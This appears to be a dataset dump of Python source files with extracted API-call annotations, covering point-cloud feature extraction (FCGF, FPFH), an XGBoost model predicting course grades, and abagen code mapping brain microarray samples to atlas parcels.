(1270, 1293), True, 'import tensorflow as tf\n'), ((1386, 1408), 'numpy.random.rand', 'np.random.rand', (['(2)', '(100)'], {}), '(2, 100)\n', (1400, 1408), True, 'import numpy as np\n'), ((1419, 1445), 'numpy.dot', 'np.dot', (['[0.1, 0.2]', 'x_data'], {}), '([0.1, 0.2], x_data)\n', (1425, 1445), True, 'import numpy as np\n'), ((1477, 1490), 'tensorflow.zeros', 'tf.zeros', (['[1]'], {}), '([1])\n', (1485, 1490), True, 'import tensorflow as tf\n'), ((1519, 1555), 'tensorflow.random_uniform', 'tf.random_uniform', (['[1, 2]', '(-1.0)', '(1.0)'], {}), '([1, 2], -1.0, 1.0)\n', (1536, 1555), True, 'import tensorflow as tf\n'), ((1579, 1614), 'tensorflow.matmul', 'tf.matmul', (['W', 'x_data'], {'name': '"""MatMul"""'}), "(W, x_data, name='MatMul')\n", (1588, 1614), True, 'import tensorflow as tf\n'), ((1876, 1904), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""W"""', 'W'], {}), "('W', W)\n", (1896, 1904), True, 'import tensorflow as tf\n'), ((1905, 1933), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""b"""', 'b'], {}), "('b', b)\n", (1925, 1933), True, 'import tensorflow as tf\n'), ((1935, 1966), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'loss'], {}), "('loss', loss)\n", (1952, 1966), True, 'import tensorflow as tf\n'), ((1666, 1700), 'tensorflow.subtract', 'tf.subtract', (['y', 'y_data'], {'name': '"""Sub"""'}), "(y, y_data, name='Sub')\n", (1677, 1700), True, 'import tensorflow as tf\n'), ((1169, 1191), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (1183, 1191), False, 'import random\n')]
|
import logging
import os
from abc import ABC
import gin
import MinkowskiEngine as ME
import numpy as np
import open3d as o3d
import torch
from src.models import get_model
class BaseFeatureExtractor(ABC):
def __init__(self):
logging.info(f"Initialize {self.__class__.__name__}")
def extract_feature(self, xyz):
raise NotImplementedError("Feature should implement extract_feature method.")
@gin.configurable()
class FCGF(BaseFeatureExtractor):
def __init__(self, voxel_size, checkpoint_path, device):
super().__init__()
self.voxel_size = voxel_size
self.device = device
assert os.path.exists(checkpoint_path), f"{checkpoint_path} not exists"
MODEL = get_model("ResUNetBN2C")
feat_model = MODEL(
1, 32, bn_momentum=0.05, conv1_kernel_size=7, normalize_feature=True
).to(device)
checkpoint = torch.load(checkpoint_path)
feat_model.load_state_dict(checkpoint["state_dict"])
self.feat_model = feat_model
self.feat_model.eval()
def freeze(self):
for param in self.feat_model.parameters():
param.requires_grad = False
def extract_feature(self, xyz, coords=None, feats=None):
if coords is None or feats is None:
# quantize input xyz.
coords, sel = ME.utils.sparse_quantize(
xyz / self.voxel_size, return_index=True
)
# make sparse tensor.
coords = ME.utils.batched_coordinates([coords])
feats = torch.ones((coords.shape[0], 1)).float()
sinput = ME.SparseTensor(
feats.to(self.device), coordinates=coords.to(self.device)
)
if isinstance(xyz, np.ndarray):
xyz = torch.from_numpy(xyz)
xyz = xyz[sel].float().to(self.device)
else:
sinput = ME.SparseTensor(coordinates=coords, features=feats)
# extract feature.
F = self.feat_model(sinput).F
return F, xyz
@gin.configurable()
class FPFH(BaseFeatureExtractor):
def __init__(self, voxel_size, device):
super().__init__(voxel_size, device)
def extract_feature(self, xyz):
voxel_size = self.voxel_size
if isinstance(xyz, torch.Tensor):
xyz = xyz.numpy()
# downsample
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(xyz)
pcd = pcd.voxel_down_sample(voxel_size)
# calculate normals
radius_normal = voxel_size * 2.0
pcd.estimate_normals(
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30)
)
# calculate features
radius_feature = voxel_size * 5.0
pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(
pcd, o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100)
)
xyz = torch.from_numpy(np.asarray(pcd.points)).float()
F = torch.from_numpy(pcd_fpfh.data.copy().T).float().contiguous()
return F, xyz
MODELS = [FPFH, FCGF]
@gin.configurable()
def get_feature(name):
# Find the model class from its name
all_models = MODELS
mdict = {model.__name__: model for model in all_models}
if name not in mdict:
logging.info(f"Invalid model index. You put {name}. Options are:")
# Display a list of valid model names
for model in all_models:
logging.info("\t* {}".format(model.__name__))
return None
NetClass = mdict[name]
return NetClass
|
[
"torch.ones",
"MinkowskiEngine.SparseTensor",
"torch.load",
"MinkowskiEngine.utils.sparse_quantize",
"os.path.exists",
"open3d.geometry.PointCloud",
"numpy.asarray",
"logging.info",
"open3d.geometry.KDTreeSearchParamHybrid",
"gin.configurable",
"MinkowskiEngine.utils.batched_coordinates",
"src.models.get_model",
"open3d.utility.Vector3dVector",
"torch.from_numpy"
] |
[((420, 438), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (436, 438), False, 'import gin\n'), ((2034, 2052), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (2050, 2052), False, 'import gin\n'), ((3102, 3120), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (3118, 3120), False, 'import gin\n'), ((240, 293), 'logging.info', 'logging.info', (['f"""Initialize {self.__class__.__name__}"""'], {}), "(f'Initialize {self.__class__.__name__}')\n", (252, 293), False, 'import logging\n'), ((642, 673), 'os.path.exists', 'os.path.exists', (['checkpoint_path'], {}), '(checkpoint_path)\n', (656, 673), False, 'import os\n'), ((724, 748), 'src.models.get_model', 'get_model', (['"""ResUNetBN2C"""'], {}), "('ResUNetBN2C')\n", (733, 748), False, 'from src.models import get_model\n'), ((900, 927), 'torch.load', 'torch.load', (['checkpoint_path'], {}), '(checkpoint_path)\n', (910, 927), False, 'import torch\n'), ((2358, 2383), 'open3d.geometry.PointCloud', 'o3d.geometry.PointCloud', ([], {}), '()\n', (2381, 2383), True, 'import open3d as o3d\n'), ((2405, 2436), 'open3d.utility.Vector3dVector', 'o3d.utility.Vector3dVector', (['xyz'], {}), '(xyz)\n', (2431, 2436), True, 'import open3d as o3d\n'), ((3303, 3369), 'logging.info', 'logging.info', (['f"""Invalid model index. You put {name}. Options are:"""'], {}), "(f'Invalid model index. You put {name}. Options are:')\n", (3315, 3369), False, 'import logging\n'), ((1337, 1403), 'MinkowskiEngine.utils.sparse_quantize', 'ME.utils.sparse_quantize', (['(xyz / self.voxel_size)'], {'return_index': '(True)'}), '(xyz / self.voxel_size, return_index=True)\n', (1361, 1403), True, 'import MinkowskiEngine as ME\n'), ((1490, 1528), 'MinkowskiEngine.utils.batched_coordinates', 'ME.utils.batched_coordinates', (['[coords]'], {}), '([coords])\n', (1518, 1528), True, 'import MinkowskiEngine as ME\n'), ((1890, 1941), 'MinkowskiEngine.SparseTensor', 'ME.SparseTensor', ([], {'coordinates': 'coords', 'features': 'feats'}), '(coordinates=coords, features=feats)\n', (1905, 1941), True, 'import MinkowskiEngine as ME\n'), ((2597, 2666), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_normal', 'max_nn': '(30)'}), '(radius=radius_normal, max_nn=30)\n', (2633, 2666), True, 'import open3d as o3d\n'), ((2834, 2905), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_feature', 'max_nn': '(100)'}), '(radius=radius_feature, max_nn=100)\n', (2870, 2905), True, 'import open3d as o3d\n'), ((1782, 1803), 'torch.from_numpy', 'torch.from_numpy', (['xyz'], {}), '(xyz)\n', (1798, 1803), False, 'import torch\n'), ((1549, 1581), 'torch.ones', 'torch.ones', (['(coords.shape[0], 1)'], {}), '((coords.shape[0], 1))\n', (1559, 1581), False, 'import torch\n'), ((2947, 2969), 'numpy.asarray', 'np.asarray', (['pcd.points'], {}), '(pcd.points)\n', (2957, 2969), True, 'import numpy as np\n')]
|
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from xgboost import XGBRegressor
import os
from django.conf import settings
import numpy as np
from functools import lru_cache
RANDOM_STATE = 42
def get_path(course, file):
return os.path.join(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit', course, file)
@lru_cache(maxsize=32)
def load_data(course):
# Loading the final grade and the student list
final_grades = pd.read_csv(get_path(course, 'final_grades.csv'), index_col='user_id')
course_feature = pd.read_csv(get_path(course, 'coursewised_feature.csv'),
index_col='user_id').fillna(0)
# cg = pd.read_csv(get_path(course, 'chapter_grades.csv'))
# cg = cg.pivot(index='user_id', columns='chapter_mid', values='chgrade').fillna(0)
cv = pd.read_csv(get_path(course, 'chapter_videos.csv'))
cv = cv.pivot(index='user_id', columns='chapter_name', values='video_count').fillna(0)
# note that the above dfs have same index 'user_id'
# # merge the course_videos and course_grades
# features = \
# cg.join(cv, on=None, how='outer', lsuffix='_grade', rsuffix='_video_count').fillna(0)
features = cv
# full outer join on cv.user_id = course_feature.user_id
features = features.join(course_feature, how='outer').fillna(0)
# final_grades is y-data => left outer join on final_grades.user_id = features.user_id
df = final_grades.join(features, how='left').fillna(0)
# exclude the 'final_grade' and 'nproblem_check'
X = df.drop(['final_grade', 'nproblem_check', 'username'], axis=1)
y = df['final_grade']
return X, y
def get_user_chapter_grades(course, user_id):
chapter_grade = pd.read_csv(get_path(course, 'chapter_grade.csv'), index_col=['user_id', 'chapter_id'])
result = []
for chapter_id, chapter_grade in chapter_grade.loc[user_id]['chapter_grade'].iteritems():
result.append({"name": "Chapter "+str(chapter_id), "score": chapter_grade})
return result
def main():
course = 'VJx__VJx_2__3T2016'
filename = 'model.xgb'
X, y = load_data(course)
# Normalization
scaler = MinMaxScaler()
scaler.fit(X)
X = scaler.transform(X)
model = XGBRegressor()
if os.path.isfile(filename):
model.load_model(filename)
else:
model.fit(X, y)
model.save_model(filename)
y_ = model.predict(X)
print(y_)
model_cache = {}
data_transformer = {}
def predict(course_code, user_id):
filename = get_path(course_code, '%s_model.xgb' % course_code)
X, y = load_data(course_code)
user_X = X.loc[user_id]
# Normalization
if course_code not in data_transformer:
scaler = MinMaxScaler()
scaler.fit(X)
data_transformer[course_code] = scaler
scaler = data_transformer[course_code]
if course_code not in model_cache:
model = XGBRegressor()
if os.path.isfile(filename):
model.load_model(filename)
else:
X = scaler.transform(X)
model.fit(X, y)
model.save_model(filename)
model_cache[course_code] = model
model = model_cache[course_code]
X = scaler.transform(X)
y_ = model.predict(X)
hist, bin_edges = np.histogram(y_, bins=10, range=[0, 1])
return {
"classFinalExamDistribution": hist.tolist(),
"myChapterScore": get_user_chapter_grades(course_code, user_id),
"myPredictedFinalExamScore": float(model.predict(user_X)[0])
}
if __name__ == '__main__':
main()
|
[
"sklearn.preprocessing.MinMaxScaler",
"os.path.isfile",
"numpy.histogram",
"xgboost.XGBRegressor",
"functools.lru_cache",
"os.path.join"
] |
[((344, 365), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(32)'}), '(maxsize=32)\n', (353, 365), False, 'from functools import lru_cache\n'), ((254, 344), 'os.path.join', 'os.path.join', (['settings.PROJECT_ROOT', '""".."""', '"""pandas_api"""', '"""static"""', '"""mit"""', 'course', 'file'], {}), "(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit',\n course, file)\n", (266, 344), False, 'import os\n'), ((2171, 2185), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2183, 2185), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2245, 2259), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2257, 2259), False, 'from xgboost import XGBRegressor\n'), ((2267, 2291), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2281, 2291), False, 'import os\n'), ((3275, 3314), 'numpy.histogram', 'np.histogram', (['y_'], {'bins': '(10)', 'range': '[0, 1]'}), '(y_, bins=10, range=[0, 1])\n', (3287, 3314), True, 'import numpy as np\n'), ((2728, 2742), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2740, 2742), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2911, 2925), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2923, 2925), False, 'from xgboost import XGBRegressor\n'), ((2937, 2961), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2951, 2961), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
"""
Functions for mapping AHBA microarray dataset to atlases and and parcellations
in MNI space
"""
from functools import reduce
from nilearn._utils import check_niimg_3d
import numpy as np
import pandas as pd
from scipy.spatial.distance import cdist
from abagen import datasets, io, process, utils
def _assign_sample(sample, atlas, sample_info=None, atlas_info=None,
tolerance=2):
"""
Determines which parcel `sample` belongs to in `atlas`
Parameters
----------
sample : (1, 3) array_like
Coordinates (ijk) of microarray sample in `atlas` space
atlas : niimg-like object
ROI image, where each ROI should be identified with a unique
integer ID
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
atlas_info : pandas.DataFrame,
Dataframe containing information about the specified `atlas`. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
label : int
Parcel label of `sample`
"""
# pull relevant info from atlas
label_data = check_niimg_3d(atlas).get_data()
# expand provided coordinates to include those w/i `tolerance` of `coords`
# set a hard euclidean distance limit to account for different voxel sizes
coords = utils.expand_roi(sample, dilation=tolerance, return_array=True)
coords = coords[cdist(sample, coords).squeeze() < tolerance]
# grab non-zero labels for expanded coordinates
possible_labels = label_data[coords[:, 0], coords[:, 1], coords[:, 2]]
nz_labels = possible_labels[possible_labels.nonzero()]
labels, counts = np.unique(nz_labels, return_counts=True)
# if atlas_info and sample_info are provided, drop potential labels who
# don't match hemisphere or structural class defined in `sample_info`
if atlas_info is not None and sample_info is not None:
for old_label in labels:
new_label = _check_label(old_label, sample_info, atlas_info)
if old_label != new_label:
nz_labels[nz_labels == old_label] = new_label
labels, counts = np.unique(nz_labels[nz_labels.nonzero()],
return_counts=True)
# if there is still nothing in the vicinity, return 0
if labels.size == 0:
return 0
# if there is only one ROI in the vicinity, use that
elif labels.size == 1:
return labels[0]
# if more than one ROI in the vicinity, return the most frequent
indmax, = np.where(counts == counts.max())
if indmax.size == 1:
return labels[indmax[0]]
# if two or more parcels tied for neighboring frequency, use ROI
# with closest centroid to `coords`
centroids = utils.get_centroids(atlas, labels)
return labels[utils.closest_centroid(sample, centroids)]
def _check_label(label, sample_info, atlas_info):
"""
Checks that `label` defined by `sample_info` is coherent with `atlas_info`
Parameters
----------
label : int
Tenative label for sample described by `sample_info`
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
atlas_info : pandas.DataFrame,
Dataframe containing information about the atlas of interest. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
Returns
-------
label : int
New label for sample
"""
cols = ['hemisphere', 'structure']
if label != 0:
sample_info = sample_info[cols]
atlas_info = atlas_info.loc[label][cols]
if not np.all(sample_info.values == atlas_info.values):
label = 0
return label
def label_samples(annotation, atlas, atlas_info=None, tolerance=2):
"""
Matches all microarray samples in `annotation` to parcels in `atlas`
Attempts to place each sample provided in `annotation` into a parcel in
`atlas`, where the latter is a 3D niimg-like object that contains parcels
each idnetified by a unique integer ID.
The function tries to best match samples in `annotation` to parcels defined
in `atlas` by:
1. Determining if the sample falls directly within a parcel,
2. Checking to see if there are nearby parcels by slowly expanding the
search space to include nearby voxels, up to a specified distance
(specified via the `tolerance` parameter),
3. Assigning the sample to the closest parcel if there are multiple
nearby parcels, where closest is determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If there is still no parcel for a given sample after this
process the sample is provided a label of 0.
Parameters
----------
annotation : (S, 13) pandas.DataFrame
Pre-loaded annotation information for a given AHBA donor
atlas : niimg-like object
A parcellation image in MNI space, where each parcel is identified by a
unique integer ID
atlas_info : pandas.DataFrame, optional
Filepath to or pre-loaded dataframe containing information about
`atlas`. Must have _at least_ columns 'id', 'hemisphere', and
'structure' containing information mapping atlas IDs to hemisphere and
broad structural class (i.e., "cortex", "subcortex", "cerebellum").
Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
labels : (S, 1) pandas.DataFrame
Dataframe with parcel labels for each of `S` samples
"""
# get annotation and atlas data
annotation = io.read_annotation(annotation)
atlas = check_niimg_3d(atlas)
label_data, affine = atlas.get_data(), atlas.affine
# load atlas_info, if provided
if atlas_info is not None:
atlas_info = utils.check_atlas_info(atlas, atlas_info)
# get ijk coordinates for microarray samples and find labels
g_ijk = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']], affine)
labelled_samples = label_data[g_ijk[:, 0], g_ijk[:, 1], g_ijk[:, 2]]
# if sample coordinates aren't directly inside a parcel, increment radius
# around sample up to `tolerance` to try and find nearby parcels.
# if still no parcel, then ignore this sample
for idx in np.where(labelled_samples == 0)[0]:
label, tol = labelled_samples[idx], 1
while label == 0 and tol <= tolerance:
label = _assign_sample(g_ijk[[idx]], atlas,
sample_info=annotation.iloc[idx],
atlas_info=atlas_info,
tolerance=tol)
tol += 1
labelled_samples[idx] = label
return pd.DataFrame(labelled_samples, dtype=int,
columns=['label'], index=annotation.index)
def group_by_label(microarray, sample_labels, labels=None, metric='mean'):
"""
Averages expression data in `microarray` over samples with same label
Parameters
----------
microarray : (S, G) pandas.DataFrame
Microarray expression data, where `S` is samples and `G` is genes
sample_labels : (S, 1) pandas.DataFrame
Parcel labels for `S` samples, as returned by e.g., `label_samples()`
labels : (L,) array_like, optional
All possible labels for parcellation (to account for possibility that
some parcels have NO expression data). Default: None
metric : str or func, optional
Mechanism by which to collapse across samples within a parcel. If a
str, should be in ['mean', 'median']; if a function, should be able to
accept an `N`-dimensional input and the `axis` keyword argument and
return an `N-1`-dimensional output. Default: 'mean'
Returns
-------
gene_by_label : (L, G) pandas.DataFrame
Microarray expression data
"""
# get combination function
metric = utils.check_metric(metric)
# get missing labels
if labels is not None:
missing = np.setdiff1d(labels, sample_labels)
labels = pd.DataFrame(columns=microarray.columns,
index=pd.Series(missing, name='label'))
gene_by_label = (microarray.merge(sample_labels,
left_index=True,
right_index=True)
.groupby('label')
.aggregate(metric)
.append(labels)
.drop([0])
.sort_index()
.rename_axis('label'))
return gene_by_label
def get_expression_data(atlas, atlas_info=None, *, exact=True,
tolerance=2, metric='mean', ibf_threshold=0.5,
corrected_mni=True, reannotated=True,
return_counts=False, return_donors=False,
donors='all', data_dir=None):
"""
Assigns microarray expression data to ROIs defined in `atlas`
This function aims to provide a workflow for generating pre-processed,
microarray expression data for abitrary `atlas` designations. First, some
basic filtering of genetic probes is performed, including:
1. Intensity-based filtering of microarray probes to remove probes that
do not exceed a certain level of background noise (specified via the
`ibf_threshold` parameter), and
2. Selection of a single, representative probe for each gene via a
differential stability metric, wherein the probe that has the most
consistent regional variation across donors is retained.
Tissue samples are then matched to parcels in the defined `atlas` for each
donor. If `atlas_info` is provided then this matching is constrained by
both hemisphere and tissue class designation (e.g., cortical samples from
the left hemisphere are only matched to ROIs in the left cortex,
subcortical samples from the right hemisphere are only matched to ROIs in
the left subcortex); see the `atlas_info` parameter description for more
information.
Matching of microarray samples to parcels in `atlas` is done via a multi-
step process:
1. Determine if the sample falls directly within a parcel,
2. Check to see if there are nearby parcels by slowly expanding the
search space to include nearby voxels, up to a specified distance
(specified via the `tolerance` parameter),
3. If there are multiple nearby parcels, the sample is assigned to the
closest parcel, as determined by the parcel centroid.
If at any step a sample can be assigned to a parcel the matching process is
terminated. If multiple sample are assigned to the same parcel they are
aggregated with the metric specified via the `metric` parameter. More
control over the sample matching can be obtained by setting the `exact`
parameter; see the parameter description for more information.
Once all samples have been matched to parcels for all supplied donors, the
microarray expression data are normalized within-donor via a scaled robust
sigmoid (SRS) procedure before being combined across donors via the
supplied `metric`.
Parameters
----------
atlas : niimg-like object
A parcellation image in MNI space, where each parcel is identified by a
unique integer ID
atlas_info : str or :class:`pandas.DataFrame`, optional
Filepath to or pre-loaded dataframe containing information about
`atlas`. Must have at least columns 'id', 'hemisphere', and 'structure'
containing information mapping atlas IDs to hemisphere (i.e, "L", "R")
and broad structural class (i.e., "cortex", "subcortex", "cerebellum").
Default: None
exact : bool, optional
Whether to use exact matching of donor tissue samples to parcels in
`atlas`. If True, this function will match tissue samples to parcels
within `threshold` mm of the sample; any samples that are beyond
`threshold` mm of a parcel will be discarded. This may result in some
parcels having no assigned sample / expression data. If False, the
default matching procedure will be performed and followed by a check
for parcels with no assigned samples; any such parcels will be matched
to the nearest sample (nearest defined as the sample with the closest
Euclidean distance to the parcel centroid). Default: True
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
metric : str or func, optional
Mechanism by which to collapse across donors, if input `files` provides
multiple donor datasets. If a str, should be in ['mean', 'median']; if
a function, should be able to accept an `N`-dimensional input and the
`axis` keyword argument and return an `N-1`-dimensional output.
Default: 'mean'
ibf_threshold : [0, 1] float, optional
Threshold for intensity-based filtering specifying. This number should
specify the ratio of samples, across all supplied donors, for which a
probe must have signal above background noise in order to be retained.
Default: 0.5
corrected_mni : bool, optional
Whether to use the "corrected" MNI coordinates shipped with the
`alleninf` package instead of the coordinates provided with the AHBA
data when matching tissue samples to anatomical regions. Default: True
reannotated : bool, optional
Whether to use reannotated probe information provided by [1]_ instead
of the default probe information from the AHBA dataset. Using
reannotated information will discard probes that could not be reliably
matched to genes. Default: True
return_counts : bool, optional
Whether to return how many samples were assigned to each parcel in
`atlas` for each donor. Default: False
return_donors : bool, optional
Whether to return donor-level expression arrays instead of aggregating
expression across donors with provided `metric`. Default: False
donors : list, optional
List of donors to use as sources of expression data. Can be either
donor numbers or UID. If not specified will use all available donors.
Default: 'all'
data_dir : str, optional
Directory where expression data should be downloaded (if it does not
already exist) / loaded. If not specified will use the current
directory. Default: None
Returns
-------
expression : (R, G) :class:`pandas.DataFrame`
Microarray expression for `R` regions in `atlas` for `G` genes,
aggregated across donors, where the index corresponds to the unique
integer IDs of `atlas` and the columns are gene names.
counts : (R, D) :class:`pandas.DataFrame`
Number of samples assigned to each of `R` regions in `atlas` for each
of `D` donors (if multiple donors were specified); only returned if
`return_counts=True`.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2019). A
practical guide to linking brain-wide gene expression and neuroimaging
data. NeuroImage, 189, 353-367.
.. [2] <NAME>. et al. (2012) An anatomically comprehensive atlas of
the adult human transcriptome. Nature, 489, 391-399.
"""
# fetch files
files = datasets.fetch_microarray(data_dir=data_dir, donors=donors)
for key in ['microarray', 'probes', 'annotation', 'pacall', 'ontology']:
if key not in files:
raise KeyError('Provided `files` dictionary is missing {}. '
'Please check inputs.'.format(key))
# load atlas_info, if provided
atlas = check_niimg_3d(atlas)
if atlas_info is not None:
atlas_info = utils.check_atlas_info(atlas, atlas_info)
# get combination functions
metric = utils.check_metric(metric)
# get some info on the number of subjects, labels in `atlas_img`
num_subj = len(files.microarray)
all_labels = utils.get_unique_labels(atlas)
if not exact:
centroids = utils.get_centroids(atlas, labels=all_labels)
# reannotate probes based on updates from Arnatkeviciute et al., 2018 then
# perform intensity-based filter of probes and select probe with highest
# differential stability for each gene amongst remaining probes
if reannotated:
probes = process.reannotate_probes(files.probes[0])
else:
probes = io.read_probes(files.probes[0])
probes = process.filter_probes(files.pacall, probes,
threshold=ibf_threshold)
probes = process.get_stable_probes(files.microarray, files.annotation,
probes)
expression, missing = [], []
counts = pd.DataFrame(np.zeros((len(all_labels) + 1, num_subj)),
index=np.append([0], all_labels))
for subj in range(num_subj):
# get rid of samples whose coordinates don't match ontological profile
annotation = process.drop_mismatch_samples(files.annotation[subj],
files.ontology[subj],
corrected=corrected_mni)
# subset representative probes + samples from microarray data
microarray = io.read_microarray(files.microarray[subj])
samples = microarray.loc[probes.index, annotation.index].T
samples.columns = probes.gene_symbol
# assign samples to regions and aggregate samples w/i the same region
sample_labels = label_samples(annotation, atlas,
atlas_info=atlas_info,
tolerance=tolerance)
expression += [group_by_label(samples, sample_labels,
all_labels, metric=metric)]
# get counts of samples collapsed into each ROI
labs, num = np.unique(sample_labels, return_counts=True)
counts.loc[labs, subj] = num
# if we don't want to do exact matching then cache which parcels are
# missing data and the expression data for the closest sample to that
# parcel; we'll use this once we've iterated through all donors
if not exact:
coords = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']],
atlas.affine)
empty = ~np.in1d(all_labels, labs)
closest, dist = utils.closest_centroid(coords, centroids[empty],
return_dist=True)
closest = samples.loc[annotation.iloc[closest].index]
empty = all_labels[empty]
closest.index = pd.Series(empty, name='label')
missing += [(closest, dict(zip(empty, np.diag(dist))))]
# check for missing ROIs and fill in, as needed
if not exact:
# find labels that are missing across all donors
empty = reduce(set.intersection, [set(f.index) for f, d in missing])
for roi in empty:
# find donor with sample closest to centroid of empty parcel
ind = np.argmin([d.get(roi) for f, d in missing])
# assign expression data from that sample and add to count
expression[ind].loc[roi] = missing[ind][0].loc[roi]
counts.loc[roi, ind] += 1
# normalize data with SRS and aggregate across donors
expression = [process.normalize_expression(e) for e in expression]
if not return_donors:
expression = process.aggregate_donors(expression, metric)
if return_counts:
return expression, counts.iloc[1:]
return expression
|
[
"abagen.utils.check_metric",
"abagen.utils.xyz_to_ijk",
"abagen.io.read_probes",
"abagen.process.drop_mismatch_samples",
"numpy.diag",
"numpy.unique",
"pandas.DataFrame",
"abagen.utils.closest_centroid",
"abagen.process.get_stable_probes",
"abagen.process.normalize_expression",
"nilearn._utils.check_niimg_3d",
"abagen.process.filter_probes",
"numpy.append",
"scipy.spatial.distance.cdist",
"abagen.utils.check_atlas_info",
"abagen.io.read_microarray",
"abagen.utils.get_unique_labels",
"abagen.utils.expand_roi",
"pandas.Series",
"abagen.io.read_annotation",
"numpy.all",
"abagen.process.aggregate_donors",
"abagen.utils.get_centroids",
"abagen.datasets.fetch_microarray",
"numpy.setdiff1d",
"numpy.where",
"abagen.process.reannotate_probes",
"numpy.in1d"
] |
[((1758, 1821), 'abagen.utils.expand_roi', 'utils.expand_roi', (['sample'], {'dilation': 'tolerance', 'return_array': '(True)'}), '(sample, dilation=tolerance, return_array=True)\n', (1774, 1821), False, 'from abagen import datasets, io, process, utils\n'), ((2095, 2135), 'numpy.unique', 'np.unique', (['nz_labels'], {'return_counts': '(True)'}), '(nz_labels, return_counts=True)\n', (2104, 2135), True, 'import numpy as np\n'), ((3186, 3220), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas', 'labels'], {}), '(atlas, labels)\n', (3205, 3220), False, 'from abagen import datasets, io, process, utils\n'), ((6448, 6478), 'abagen.io.read_annotation', 'io.read_annotation', (['annotation'], {}), '(annotation)\n', (6466, 6478), False, 'from abagen import datasets, io, process, utils\n'), ((6491, 6512), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (6505, 6512), False, 'from nilearn._utils import check_niimg_3d\n'), ((6777, 6842), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], affine)\n", (6793, 6842), False, 'from abagen import datasets, io, process, utils\n'), ((7563, 7652), 'pandas.DataFrame', 'pd.DataFrame', (['labelled_samples'], {'dtype': 'int', 'columns': "['label']", 'index': 'annotation.index'}), "(labelled_samples, dtype=int, columns=['label'], index=\n annotation.index)\n", (7575, 7652), True, 'import pandas as pd\n'), ((8760, 8786), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (8778, 8786), False, 'from abagen import datasets, io, process, utils\n'), ((16518, 16577), 'abagen.datasets.fetch_microarray', 'datasets.fetch_microarray', ([], {'data_dir': 'data_dir', 'donors': 'donors'}), '(data_dir=data_dir, donors=donors)\n', (16543, 16577), False, 'from abagen import datasets, io, process, utils\n'), ((16868, 16889), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (16882, 16889), False, 'from nilearn._utils import check_niimg_3d\n'), ((17030, 17056), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (17048, 17056), False, 'from abagen import datasets, io, process, utils\n'), ((17181, 17211), 'abagen.utils.get_unique_labels', 'utils.get_unique_labels', (['atlas'], {}), '(atlas)\n', (17204, 17211), False, 'from abagen import datasets, io, process, utils\n'), ((17673, 17741), 'abagen.process.filter_probes', 'process.filter_probes', (['files.pacall', 'probes'], {'threshold': 'ibf_threshold'}), '(files.pacall, probes, threshold=ibf_threshold)\n', (17694, 17741), False, 'from abagen import datasets, io, process, utils\n'), ((17790, 17859), 'abagen.process.get_stable_probes', 'process.get_stable_probes', (['files.microarray', 'files.annotation', 'probes'], {}), '(files.microarray, files.annotation, probes)\n', (17815, 17859), False, 'from abagen import datasets, io, process, utils\n'), ((3239, 3280), 'abagen.utils.closest_centroid', 'utils.closest_centroid', (['sample', 'centroids'], {}), '(sample, centroids)\n', (3261, 3280), False, 'from abagen import datasets, io, process, utils\n'), ((6657, 6698), 'abagen.utils.check_atlas_info', 'utils.check_atlas_info', (['atlas', 'atlas_info'], {}), '(atlas, atlas_info)\n', (6679, 